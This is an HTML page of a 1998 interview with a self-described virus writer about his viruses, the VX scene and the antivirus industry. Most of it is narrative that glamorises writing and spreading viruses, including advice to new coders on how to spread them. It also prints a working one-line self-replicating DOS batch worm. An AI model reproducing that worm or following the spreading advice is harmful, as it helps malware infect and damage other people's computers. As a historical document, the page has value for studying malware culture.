<html>

<head>

<title>Interview Q The Misanthrope [2]</title>
</head>

<body background="ivback01.gif" bgcolor="#C0C0C0" text="#000000"
link="#800000" vlink="#800000" alink="#800000">

<p align="center"><font color="#004080" size="6"><strong>Interview
with Q The Misanthrope<br>
</strong></font><font color="#004080" size="4"><strong>by Nucleii</strong><br>
</font><font color="#004080">[July 1998]</font></p>

<hr>

<p><font color="#004080"><strong>How did you first get started
with computers and programming? </strong></font></p>

<blockquote>
    <p>A million years ago, OK, it was 26 years ago, I was taken
    to the University to learn BASIC programming. This program
    was available through our Junior High School once a week. The
    program was only available to &quot;Gifted&quot; individuals.
    I wrote a couple of game programs. The next year, the same
    group of kids that went to the University, rented a Teletype
    for the summer to be used at each kid's home on a rotating
    basis. I continued to program. In High School, we also had a
    Teletype to the same University. I stayed after school every
    day for the 4 years of High School, teaching myself. I have
    been into Electronics since I was about 5. So in High School,
    I built my own PC. It cost about $3000 (I earned every cent).
    It was a great PC. Processor Technologies S-100 mother board,
    Intel 8080, 60K of Godbout memory, IMSAI Front Panel, 2
    Northstar 89k floppy drives, Northstar Math Processor Board.
    I had Electric Pencil, BASIC, DEBUG and CPM. I had to write
    8080 assembly code to patch the I/O to the OS. </p>
</blockquote>

<p><font color="#004080"><strong>What was your first experience
with viruses? </strong></font></p>

<blockquote>
    <p>WORMS (replicating but not appending) were my first
    experience. This was in BASIC in Junior High, I wrote one. My
    first virus encounter was Sunday, then Stoned. These are real
    simple viruses and after Debugging them, I didn't learn much.
    I learned more from a pirated copy of HELPPC about the
    fundamental workings of the PC. </p>
</blockquote>

<p><font color="#004080"><strong>Why did you start coding
viruses? </strong></font></p>

<blockquote>
    <p>I wanted my virus write-up in Patricia Hoffman's VSUM to
    be better than her Gingerbread description. So I wrote SNAFU.
    To this day, the bitch has never eval'd one of my viruses. </p>
</blockquote>

<p><font color="#004080"><strong>What is your personal opinion
about harmful payloads, and you ethical opinions around viruses? </strong></font></p>

<blockquote>
    <p>I don't like destructive payloads. Trash the data is bad.
    Make the hardware malfunction weirdly is good. Hey, I figured
    out how to bypass with software the Keyboard Key switch (if
    that isn't weird, I don't know what is). Ethics and viruses,
    I feel that I am a purist as far as virus writing (I have
    never set any of my creations free). I feel that some of the
    best research into the PC is by virus writers. Viruses are
    the purest form of shareware. I feel that virus writers write
    viruses to be able to share learning experiences with each
    other and the rest of the world be damned. They are just
    playing Chess with other virus writers and the AV community
    as a whole. The kids who actually release harmful viruses do
    it for different reasons (ask them). </p>
</blockquote>

<p><font color="#004080"><strong>Did you ever wind up with a job
because of your experience with computers in general? </strong></font></p>

<blockquote>
    <p>Yes. I make very good money and do very little and have
    made myself nonreplaceable in the job that I have. </p>
</blockquote>

<p><font color="#004080"><strong>Have you had any direct contact
with the av? What's your ethical opinion about the av in general?
</strong></font></p>

<blockquote>
    <p>No contact. I like playing Chess with them. We have a
    symbiotic relationship. </p>
</blockquote>

<p><font color="#004080"><strong>Why have you always worked
alone? What is your view on vx groups? </strong></font></p>

<blockquote>
    <p>In my <a href="ivqmisan.htm">previous interview with
    Cicatrix</a>, I stated that I have never told anyone what I
    did because if you ask anyone in prison why they are there,
    they will tell you it was because they told someone. I always
    assume that most everything that I do is illegal, so the less
    people involved the better. VX groups are a great way to go
    if you are starting out, they are also good if they are at
    the same level as you. The best thing about VX groups is that
    they produce a mag for everyone to learn from. </p>
</blockquote>

<p><font color="#004080"><strong>How many &quot;known&quot;
viruses have you written, and which pieces are your favorite
work? </strong></font></p>

<blockquote>
    <p>The answer to life, the universe and everything is: 42.
    That is also the number of known virii I have made. My
    favorite one was HighJaq. HighJaq has a very unique payload,
    your PC can be High-Jacked to gain full control of it. It
    works with your Modem, if you call the PC's Modem 3 times in
    3 minutes, the PC resets (even if you are running Windows 95)
    and then waits for the hacker to call again and is presented
    with a C:\&gt; prompt. I got this idea from reading an AV
    article discussing the various forms of destruction that a
    virus can do. One side was the simple &quot;Trash the
    data&quot;, then to the more advanced &quot;Drop random bits
    slowly&quot;, to the &quot;No way to ever know which data has
    been compromised&quot; at the worst end of the destruction. I
    figured that if someone had full access to you PC with TAX
    records and Bank statements and maybe your journal, this
    would be the worst sort of compromise. HighJaq was created to
    fill this void in the world. Thanks go to the AV community
    for giving me this idea. </p>
</blockquote>

<p><font color="#004080"><strong>When was the last time you wrote
a virus? Considering your taking this interview, you must be
somewhat active still.... </strong></font></p>

<blockquote>
    <p>I wrote Nul-Space and HMA-Boot and You-Got-it for <a
    href="ezines1.htm#29A">29A-2</a> just recently. I also have
    been playing with some new techniques that might work for a
    virus. I am currently writing an article for 29A-3. </p>
</blockquote>

<p><font color="#004080"><strong>Where do you think the technical
aspects of virus code, the AV, and the future of viruses in
general are headed? </strong></font></p>

<blockquote>
    <p>Mr. Bill just announced what Microsoft's Email would be
    like in the future. Can we say &quot;Good-Times&quot; is for
    real. What kind of butt-head would allow you to open an Email
    message and have it automatically launch a Visual Basic
    script. Mr. Bill is evil (this is not necessarily a bad
    thing) and is on our (the VX) side. Sun developed JAVA to
    make it incapable of spreading a virus. Mr. Bill developed
    Word with Macro's that make it easy to create viruses. The VX
    scene will find all the holes Mr. Bill has created and
    exploit them to the extreme. </p>
</blockquote>

<p><font color="#004080"><strong>Do you feel like the hype over
viruses with ever explode again like it did a few years ago? </strong></font></p>

<blockquote>
    <p>The media hype may never be the same as it was about
    Michelangelo. The media got burned by Make-A-Fee (Fool me
    once, shame on you, fool me twice, shame on me). But all
    these Email Hoax's have certainly created more hype than
    Michelangelo ever did. </p>
</blockquote>

<p><font color="#004080"><strong>From your point of view, how has
the VX &quot;scene&quot; changed over time? </strong></font></p>

<blockquote>
    <p>It really hasn't. You always had new faces, they stayed
    around for about a year or two and then dropped off. New
    groups would start and old groups stop. BBS's and Web sites
    come and go. The VX &quot;scene&quot; has always been an
    evolving and changing thing. New techniques are developed by
    some but most just learn to code their first unimpressive
    virus and don't go farther from there. </p>
</blockquote>

<p><font color="#004080"><strong>According to the April 1998 Joe
Wells wild list, it seems DA_Boys is still running free around
Belgium, USA, Iceland, etc. Any comments? </strong></font></p>

<blockquote>
    <p>See what happens when you give children loaded guns.
    Da'Boys is harmless, it disabled COM4. I am just surprised it
    is still around. I was pleased to see that Da'Boys caused a
    copyright infringement problem for the AV guys. Microsoft had
    the DOS Boot Sector copyrighted and the AV community had to
    get permission to rebuild it. </p>
</blockquote>

<p><font color="#004080"><strong>Have you ever coded or had any
interest in macro viruses? </strong></font></p>

<blockquote>
    <p>Almost, I wrote RAMBLE.WK1 that launched a virus from a
    123 Macro. I have no real interest in Macro viruses. </p>
</blockquote>

<p><font color="#004080"><strong>What inspires you to come up
with some of the &quot;unorthodox&quot; code. You have expressed
many new ideas over time. </strong></font></p>

<blockquote>
    <p>Ralf Brown's Interrupt list is the main source of
    inspiration. I also read all the VX/AV articles and try to
    glean any new ideas from them. I like to experiment with new
    ideas. I will play with a new idea and see if it has any
    merit and maybe incorporate it into a virus. Most of my ideas
    that never make it into a virus, they just exist as ASM
    files. I play with a new idea as often as possible. Today's
    new concept is a single line replicating REM Batch file. This
    should not work, but it does: </p>
    <p><br>
    @REM BAT.REM-WORM by Q the Misanthrope | %COMSPEC% NUL /F
    /CFOR %%Q IN (A:\ C:\<br>
    WINSTART.BAT %PATH% %WINBOOTDIR%\DOSSTART.BAT) DO COPY /B
    %0+%0.BAT %%Q<br>
    </p>
</blockquote>

<p><font color="#004080"><strong>Well, from an X-hackers point of
view, what do you think about all this recent shit going on, i.e.
the enforcers, mod, the pentagon hacks, the stolen demo software,
etc. etc.? </strong></font></p>

<blockquote>
    <p>It seems to be there for the taking. As someone who has
    done hacking and gone to prison for it, I would say don't do
    it unless you are under age. If you do it, make it a Federal
    crime, the Federal facilities are much nicer. </p>
</blockquote>

<p><font color="#004080"><strong>Do you have any favorite
writers/groups? Who and why? </strong></font></p>

<blockquote>
    <p>David Gilmore, Roger Waters/Pink Floyd. I dig their music.<br>
    Terry Gilliam, John Cleese, Michael Palan, Terry Jones, Eric
    Idle and Graham Chapman/Monty Python. I love the British
    sense of humor.<br>
    Gene Rodenbery/Star Trek. Good Sci-Fi drama.<br>
    This weeks cool virus writer: Soul Manager. The writer of the
    Red Team Email Virus. Cool idea and implementation.<br>
    I have no favorite virus group. I love the zines each group
    puts out. </p>
</blockquote>

<p><font color="#004080"><strong>Have you ever considered making
things like a polymorphic engines or creation kits? </strong></font></p>

<blockquote>
    <p>What and be just like all the other kids on the block. No
    way. There are too many out there and past the first one they
    were no longer innovative. </p>
</blockquote>

<p><font color="#004080"><strong>Anything else you want to say to
VX coders young and old? The AV community? Any other comments? </strong></font></p>

<blockquote>
    <p>To the new VX coder: </p>
    <blockquote>
        <p>read &quot;Ralf Browns Interrupt List&quot; and all
        the tutorials you can. Try to get into
        &quot;CodeBreakers&quot; or a group for starters. </p>
    </blockquote>
    <p>To the old: </p>
    <blockquote>
        <p>keep on doing the &quot;Voodoo you do so well&quot;. </p>
    </blockquote>
    <p>To the AV community: I've got nothing to say. </p>
    <blockquote>
        <p>Other comments: I think I am retiring. It has been
        fun. There is a lot of work that needs to be done it the
        Win95/98/NT environment. I don't have the resources or
        the time to play in that environment. When you develop
        viruses for Win95/98/NT, don't forget to create a good
        transport medium for your virus. Boot sector and Email
        seem to be the best for moving the virus from place to
        place (see Red Team Email Virus). Finally, if any of my
        viruses have helped you learn, you're welcome; if not, oh
        well. </p>
    </blockquote>
</blockquote>

<hr>
</body>
</html>
